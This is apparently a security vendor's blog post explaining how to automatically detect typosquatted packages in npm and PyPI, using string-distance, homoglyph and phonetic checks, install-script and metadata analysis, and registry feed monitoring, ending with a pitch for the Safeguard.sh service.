Software Supply Chain Security

Automating Typosquatting Detection for Package Registries

Typosquatting remains one of the most effective supply chain attacks. Automated detection using string distance algorithms, behavioral analysis, and registry monitoring can catch malicious packages before they reach your builds.

James
Security Architect
5 min read

Typosquatting works because humans make predictable mistakes when typing package names. A developer who types requets instead of requests or lodsah instead of lodash may install a malicious package without realizing the error. The typosquatting package installs cleanly, may even provide the expected functionality (by wrapping the legitimate package), while silently executing malicious code.

Manual detection of typosquatting is impractical. Major registries receive thousands of new package uploads daily. The only viable defense is automated detection that operates continuously, evaluating new packages against known popular packages and organizational dependencies.

Detection Algorithms

Levenshtein distance. The most basic approach measures the edit distance between a new package name and known popular packages. A new package with a Levenshtein distance of 1 from a popular package (one character added, removed, or changed) is suspicious. This catches simple typos like reqeusts (distance 2 from requests).

Limitations: Levenshtein distance generates many false positives for short package names and misses sophisticated squatting that uses phonetically similar but edit-distance-far names.

Damerau-Levenshtein distance. Extends Levenshtein to include transpositions (swapping adjacent characters) as a single operation. This better models actual typing errors, where transpositions are common.

Keyboard distance analysis. Maps package name differences to physical keyboard layout. Characters that are adjacent on a QWERTY keyboard are more likely to be typos than characters that are far apart. A package named requezts (z is adjacent to s) is more suspicious than requexts (x is not adjacent to s on most keyboards).

Phonetic similarity. Algorithms like Soundex and Metaphone detect names that sound similar when spoken. This catches attacks like colour vs color or serialise vs serialize that exploit dialect differences.

Homoglyph detection. Unicode provides characters that look identical to ASCII letters. An attacker can register a package name using Cyrillic characters that appear identical to Latin characters in most fonts. Detection requires Unicode normalization and homoglyph mapping.

Combo squatting. Adding or removing prefixes and suffixes (python-requests, requests-py, requests2, requests-lib). Pattern matching against common prefix/suffix patterns catches these variants.

Behavioral Analysis

String similarity alone generates too many false positives. Combining name analysis with behavioral analysis significantly improves accuracy.

Installation script analysis. Typosquatting packages almost always execute code during installation. Flagging packages with install scripts that make network connections, access environment variables, or execute system commands reduces false positives.

Metadata comparison. Legitimate packages have detailed descriptions, project URLs, author information, and license declarations. Typosquatting packages often have minimal or copied metadata.

Publication pattern. A new account that publishes multiple packages with names similar to popular packages in a short time is almost certainly conducting a typosquatting campaign.

Dependency analysis. Typosquatting packages often depend on the legitimate package they are impersonating (to provide expected functionality while adding malicious behavior). A new package that depends on its name-neighbor and adds install scripts is highly suspicious.

Download trajectory. Legitimate packages accumulate downloads gradually through organic adoption. Typosquatting packages may have unusual download patterns -- either very few downloads (not yet discovered) or artificial spikes (attacker testing).

Building a Detection System

Step 1: Build a reference list. Compile a list of packages that matter to your organization: your direct dependencies, popular packages in your ecosystem, and your internal package names. This is your monitoring target list.

Step 2: Monitor registry feeds. Most registries provide real-time or near-real-time feeds of new package publications. npm has the registry changes feed. PyPI has the RSS feed and JSON API. Subscribe to these feeds and evaluate each new package against your reference list.

Step 3: Apply multi-layered detection. For each new package, calculate string distances against your reference list, check for homoglyphs and keyboard-adjacent substitutions, analyze package metadata for impersonation signals, and check for suspicious install scripts.

Step 4: Score and alert. Assign a suspicion score based on the combined signals. Alert your security team for packages above the threshold. Automatically block packages above a higher threshold from your private registry.

Step 5: Feedback loop. When alerts are triaged (true positive or false positive), feed the results back into the detection system to improve scoring accuracy.

Open Source Tools

Guarddog. A CLI tool that scans PyPI and npm packages for malicious indicators, including typosquatting signals.

Packj. Audits npm and PyPI packages for risky attributes including typosquatting, install scripts, and permissions.

Socket. Commercial service that monitors npm and PyPI for supply chain risks including typosquatting, with real-time alerting.

OSSGadget. Microsoft's open source tool suite that includes typosquatting detection capabilities.

Registry-Level Defenses

Some registries are implementing their own typosquatting defenses. npm blocks publication of packages with names too similar to popular packages. PyPI has implemented similar checks. These registry-level defenses are valuable but should not be your only protection -- they cannot catch all variants and do not protect against internal package name collision.

How Safeguard.sh Helps

Safeguard.sh provides continuous typosquatting monitoring across all major package registries, tailored to your specific dependency landscape. The platform evaluates new packages against your SBOM inventory using multi-layered detection algorithms and alerts your team when potential typosquatting threats are identified. This proactive monitoring catches impersonation attempts before they can affect your builds.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.